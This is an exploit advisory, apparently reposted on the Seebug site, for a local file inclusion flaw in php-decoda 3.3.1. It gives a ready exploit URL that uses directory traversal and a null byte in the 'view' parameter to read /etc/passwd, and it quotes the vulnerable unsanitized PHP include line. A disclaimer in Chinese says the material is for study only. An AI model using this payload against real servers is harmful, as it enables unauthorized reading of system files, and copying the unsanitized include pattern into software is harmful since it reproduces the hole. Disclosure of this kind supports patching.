~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Exploit Title: [php-decoda local file inclusion ] # Date: [16/06/2012] # Author: [Number 7] # Software Link: [http://milesj.me/code/php/decoda] # Version: [3.3.1] # Tested on: [linux] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Exp: http://localhost/milesj-php-decoda/index.php?view=../../../../../../../etc/passwd%00 ~~Line 111 in Index.php: <?php include $view .'.php'; ?> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Blogpot: [http://TunisianSeven.blogspot.com/] Twitter: [@TunisianSeven]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论